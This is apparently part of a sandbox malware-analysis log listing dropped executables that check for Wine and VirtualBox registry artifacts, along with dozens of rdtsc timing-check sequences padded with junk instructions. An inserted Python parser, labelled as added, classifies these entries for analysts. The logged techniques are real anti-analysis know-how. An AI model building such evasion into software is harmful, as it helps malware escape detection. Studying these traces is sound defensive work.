Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
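Added example, written for this page and not part of the Joe Sandbox report or of the sample itself: a small Python parser that reads the registry-probe entries above and the "RDTSC instruction interceptor" entries that follow in the same format, groups them by process, maps the two registry paths to the environment each one fingerprints (Wine and VirtualBox; this mapping is the example's own assumption, based on the well-known artifact names), and labels each rdtsc pair by whether anything other than stack and jump filler executes between the two reads. The filler heuristic is likewise an assumption of this example. The sample input is constructed from a few entries on this page, with the longest one abridged.

```python
"""Parse sandbox-evasion entries from a Joe Sandbox style behaviour report.

Added example, not code from the report or from the analysed sample.
"""
import re
from collections import Counter, defaultdict

# Registry paths the report shows the droppers opening, mapped to the
# environment each one fingerprints (assumed mapping; well-known artifact names).
SANDBOX_ARTIFACTS = {
    r"HKEY_CURRENT_USER\Software\Wine": "Wine",
    r"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__": "VirtualBox",
}

# Mnemonics that do no real work between two rdtsc reads (assumption of this
# example); jumps are treated as filler as well, see classify_pair().
FILLER = {"push", "pop", "pushad", "popad", "nop"}

REG_RE = re.compile(r"^Source: (?P<proc>.+?) File opened: (?P<key>HKEY_\S+)")
RDTSC_RE = re.compile(
    r"^Source: (?P<proc>.+?) RDTSC instruction interceptor: "
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<ins>.+)$"
)
# The instruction column is "0x<offset> <instruction> 0x<offset> <instruction> ..."
OFFSET_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")

# Constructed sample: entries copied from the report above (the last one abridged).
SAMPLE = r"""
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AF1A5 second address: 3AF1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5289E7 second address: 5289F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007FBC912593F6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C1B1 second address: 52C218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FBC912593FEh 0x00000011 mov dword ptr [esp+04h], eax 0x00000048 rdtsc
"""


def split_instructions(text):
    """'0x00000000 rdtsc 0x00000002 pop edx ...' -> ['rdtsc', 'pop edx', ...]"""
    return [i.strip() for i in OFFSET_RE.split(text) if i.strip()]


def classify_pair(instructions):
    """'timing-only' when only filler sits between the two rdtsc reads, i.e.
    the delta measures little more than rdtsc itself (a hypervisor trap or
    a slow emulator shows up as a large delta); 'mixed' when real work such
    as mov/xor/call is interleaved; 'malformed' if the pair is not bracketed
    by rdtsc as the report format promises."""
    if len(instructions) < 2 or instructions[0] != "rdtsc" or instructions[-1] != "rdtsc":
        return "malformed"
    for ins in instructions[1:-1]:
        mnem = ins.split()[0]
        if mnem in FILLER or mnem.startswith("j"):
            continue
        return "mixed"
    return "timing-only"


def parse_report(lines):
    """Group registry probes and rdtsc pairs by the process path that issued them."""
    summary = defaultdict(lambda: {"artifacts": set(), "rdtsc": []})
    for line in lines:
        line = line.strip()
        m = REG_RE.match(line)
        if m:
            env = SANDBOX_ARTIFACTS.get(m["key"])
            if env:
                summary[m["proc"]]["artifacts"].add(env)
            continue
        m = RDTSC_RE.match(line)
        if m:
            ins = split_instructions(m["ins"])
            first, second = int(m["first"], 16), int(m["second"], 16)
            summary[m["proc"]]["rdtsc"].append(
                {"first": first, "second": second, "span": second - first,
                 "count": len(ins), "kind": classify_pair(ins)}
            )
    return dict(summary)


def summarise(summary):
    """One human-readable line per process."""
    out = []
    for proc, info in sorted(summary.items()):
        kinds = Counter(p["kind"] for p in info["rdtsc"])
        out.append(
            f"{proc}: probes={sorted(info['artifacts'])} "
            f"rdtsc_pairs={len(info['rdtsc'])} {dict(sorted(kinds.items()))}"
        )
    return out


if __name__ == "__main__":
    for row in summarise(parse_report(SAMPLE.splitlines())):
        print(row)
```

Feeding the whole evasion section through parse_report() gives, per dropped binary, which sandbox artifacts it looks for and how many of its rdtsc pairs are bare timing probes versus pairs wrapped around real code; the second kind is the obfuscator scattering rdtsc through ordinary instruction sequences, and the "span" field (bytes between the two reads) separates the two populations at a glance.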
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AF1A5 second address: 3AF1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AF1A9 second address: 3AF1AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AF1AD second address: 3AF1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5289E7 second address: 5289F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007FBC912593F6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C55 second address: 527C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C5B second address: 527C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C65 second address: 527C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527C6F second address: 527C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007FBC912593F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 527DCC second address: 527DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 3AEB66 second address: 3AEB73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52BFD5 second address: 52BFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52BFDA second address: 52C002 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FBC912593F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBC91259409h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C103 second address: 52C120 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007FBC9118B8BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C120 second address: 52C185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b pushad 0x0000000c call 00007FBC912593FDh 0x00000011 pop edi 0x00000012 sbb si, 8614h 0x00000017 popad 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D26CFh], ebx 0x00000021 call 00007FBC912593F9h 0x00000026 push ebx 0x00000027 push edi 0x00000028 jne 00007FBC912593F6h 0x0000002e pop edi 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push esi 0x00000035 pop esi 0x00000036 jmp 00007FBC91259409h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C185 second address: 52C1B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBC9118B8B2h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBC9118B8AEh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C1B1 second address: 52C218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FBC912593FEh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ecx 0x00000016 jmp 00007FBC91259405h 0x0000001b pop ecx 0x0000001c pop eax 0x0000001d mov esi, dword ptr [ebp+122D3A14h] 0x00000023 mov dl, 8Dh 0x00000025 push 00000003h 0x00000027 or edx, dword ptr [ebp+122D39D4h] 0x0000002d push 00000000h 0x0000002f push 00000003h 0x00000031 jg 00007FBC912593FCh 0x00000037 push FB29B5FCh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jp 00007FBC912593F6h 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C218 second address: 52C21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C21D second address: 52C26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3B29B5FCh 0x00000010 mov dx, 1902h 0x00000014 lea ebx, dword ptr [ebp+12450E5Bh] 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FBC912593F8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D26BFh], edi 0x0000003a movsx ecx, ax 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C26C second address: 52C270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C270 second address: 52C276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C325 second address: 52C32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C32A second address: 52C3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 56376BE3h 0x00000010 jmp 00007FBC91259407h 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FBC912593F8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jl 00007FBC912593F9h 0x00000037 mov si, bx 0x0000003a jmp 00007FBC91259407h 0x0000003f push 00000000h 0x00000041 movzx esi, cx 0x00000044 push 00000003h 0x00000046 mov edx, dword ptr [ebp+122D3908h] 0x0000004c call 00007FBC912593F9h 0x00000051 jmp 00007FBC912593FDh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007FBC912593FBh 0x0000005f je 00007FBC912593F6h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C3D0 second address: 52C3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 52C3D5 second address: 52C3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5492E1 second address: 5492F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBC9118B8A6h 0x00000008 jng 00007FBC9118B8A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549473 second address: 54948A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC91259401h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54948A second address: 549490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5495E8 second address: 549609 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC91259400h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FBC912593F8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5497DE second address: 54981D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBC9118B8A6h 0x0000000a pop ebx 0x0000000b jmp 00007FBC9118B8B8h 0x00000010 pushad 0x00000011 jp 00007FBC9118B8A6h 0x00000017 jmp 00007FBC9118B8B3h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549941 second address: 549958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC91259403h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549958 second address: 54997D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FBC9118B8ACh 0x00000011 jo 00007FBC9118B8A6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 54997D second address: 549983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549983 second address: 549989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549AE5 second address: 549AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 549AF3 second address: 549AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F6DE second address: 57F712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FBC9118B8B8h 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FBC9118B8AEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 57F712 second address: 57F717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585CFD second address: 585D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585D01 second address: 585D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585DC8 second address: 585E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 jne 00007FBC9118B8A8h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FBC9118B8ABh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FBC9118B8B1h 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F2A second address: 585F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F2F second address: 585F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F35 second address: 585F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F39 second address: 585F59 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC9118B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBC9118B8B0h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F59 second address: 585F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FBC912593FDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jl 00007FBC912593F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 585F7D second address: 585F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5887FA second address: 5887FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D4CB second address: 58D4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D4D1 second address: 58D4DE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C14F second address: 58C15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBC9118B8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C15B second address: 58C160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C160 second address: 58C181 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC9118B8B7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C181 second address: 58C188 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C87A second address: 58C880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C880 second address: 58C890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBC912593FBh 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C890 second address: 58C896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C896 second address: 58C89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C89A second address: 58C8A4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBC9118B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C8A4 second address: 58C8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C9F8 second address: 58C9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58C9FC second address: 58CA0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC912593FCh 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58CFD0 second address: 58CFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B4h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58CFED second address: 58CFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58CFF3 second address: 58D047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B7h 0x00000009 popad 0x0000000a jmp 00007FBC9118B8B0h 0x0000000f popad 0x00000010 js 00007FBC9118B8CCh 0x00000016 je 00007FBC9118B8BAh 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 58D19B second address: 58D1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
